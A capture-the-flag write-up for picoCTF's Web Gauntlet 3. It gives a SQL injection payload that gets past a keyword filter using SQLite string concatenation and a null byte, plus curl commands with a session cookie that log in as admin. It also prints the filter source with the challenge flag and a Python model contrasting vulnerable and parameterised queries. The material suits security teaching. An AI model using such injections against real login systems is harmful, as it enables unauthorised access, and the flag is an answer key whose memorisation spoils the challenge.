Web Gauntlet 3
Last time, I promise! Only 25 characters this time. Log in as admin.
Site: http://mercury.picoctf.net:32946/
Filter: http://mercury.picoctf.net:32946/filter.php
1. The solution query is `user=ad'||'min'%00`. The word `admin` is on the filter list, but in SQLite `||` is the string concatenation operator, so `'ad'||'min'` evaluates to `admin` without the literal ever appearing in the input, and the URL-encoded null byte (`%00`) ends the statement, so the rest of the query (the password check) is never parsed. After decoding, the payload is 11 bytes, well under the 25-character limit. It can be sent using cURL like so:

   ```
   curl --data "user=ad'||'min'%00&pass=a" http://mercury.picoctf.net:32946/index.php --cookie "PHPSESSID=n11ugic3f920cjhj6cacohmheg" --output -
   ```

   The flag can then be retrieved using this command:

   ```
   curl http://mercury.picoctf.net:32946/filter.php --cookie "PHPSESSID=n11ugic3f920cjhj6cacohmheg" | grep picoCTF
   ```

   Both requests must carry the same PHPSESSID, and the second one must be the first request to filter.php after the bypass: filter.php highlights its own source only while the session's `winner3` flag is set, and it clears that flag on the same request (hence the "Don't refresh!" comment in the code). See Web Gauntlet 2 for more information.
2. The code for the filter and the flag are shown in
`/filter.php` when the login is bypassed:

```php
<?php
session_start();

if (!isset($_SESSION["winner3"])) {
    $_SESSION["winner3"] = 0;
}
$win = $_SESSION["winner3"];
$view = ($_SERVER["PHP_SELF"] == "/filter.php");

if ($win === 0) {
    $filter = array("or", "and", "true", "false", "union", "like", "=", ">", "<", ";", "--", "/*", "*/", "admin");
    if ($view) {
        echo "Filters: ".implode(" ", $filter)."<br/>";
    }
} else if ($win === 1) {
    if ($view) {
        highlight_file("filter.php");
    }
    $_SESSION["winner3"] = 0; // <- Don't refresh!
} else {
    $_SESSION["winner3"] = 0;
}

// picoCTF{k3ep_1t_sh0rt_ef4a5b40aa736f5016b4554fecb568d0}
?>
```

picoCTF{k3ep_1t_sh0rt_ef4a5b40aa736f5016b4554fecb568d0}
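To see why the payload works, here is an added Python model of the login (example code written for this writeup, not the challenge's own index.php, whose source the page does not show). It reuses the filter list from filter.php and the 25-character limit from the challenge text, assumes the query is built by string interpolation against SQLite as in the earlier Web Gauntlet challenges, runs it against a constructed in-memory users table, and contrasts it with a parameterised query that the same payload cannot bypass. The SQL shape, the users table and the exact filter check (length test plus case-insensitive substring match) are assumptions.

```python
import sqlite3

# Filter list copied from the challenge's filter.php; the 25-character limit comes from
# the challenge text. How index.php applies them is not on the page, so the checks in
# passes_filter() (length test plus case-insensitive substring match) are an assumption.
FILTERS = ["or", "and", "true", "false", "union", "like",
           "=", ">", "<", ";", "--", "/*", "*/", "admin"]
MAX_LEN = 25

# Assumed shape of the vulnerable query: both values are interpolated straight into SQL.
VULN_SQL = "SELECT username FROM users WHERE username='{user}' AND password='{password}'"


def passes_filter(value: str) -> bool:
    """True if the (already URL-decoded) value would get past the assumed filter."""
    if len(value) > MAX_LEN:
        return False
    low = value.lower()
    return not any(word in low for word in FILTERS)


def _fresh_db() -> sqlite3.Connection:
    # Constructed sample users table; the admin password is irrelevant to the bypass.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "n0t_th3_fl4g"), ("guest", "guest")])
    return conn


def vulnerable_login(user: str, password: str):
    """Model of the challenge login: filter first, then a string-built query.
    Returns the username that was 'logged in', or None."""
    if not (passes_filter(user) and passes_filter(password)):
        return None
    sql = VULN_SQL.format(user=user, password=password)
    # SQLite's tokenizer treats a NUL byte as the end of the statement, which is what
    # makes %00 work in the challenge. Python's sqlite3 module refuses SQL text that
    # contains NUL, so the truncation is emulated explicitly before executing.
    sql = sql.split("\x00", 1)[0]
    rows = _fresh_db().execute(sql).fetchall()
    return rows[0][0] if rows else None


def hardened_login(user: str, password: str):
    """Same lookup with bound parameters: the input is data, never SQL, so neither the
    concatenation trick nor the NUL byte changes the statement."""
    rows = _fresh_db().execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (user, password)).fetchall()
    return rows[0][0] if rows else None


if __name__ == "__main__":
    payload = "ad'||'min'\x00"  # what PHP sees after decoding user=ad'||'min'%00
    print(len(payload), "bytes, passes filter:", passes_filter(payload))
    print("vulnerable login:", vulnerable_login(payload, "a"))
    print("hardened login:  ", hardened_login(payload, "a"))
```

The truncated statement that actually reaches SQLite is `SELECT username FROM users WHERE username='ad'||'min'`; `||` binds tighter than `=`, so the comparison is against the concatenated string `admin`. With bound parameters the same 11-byte input is compared literally and matches nothing.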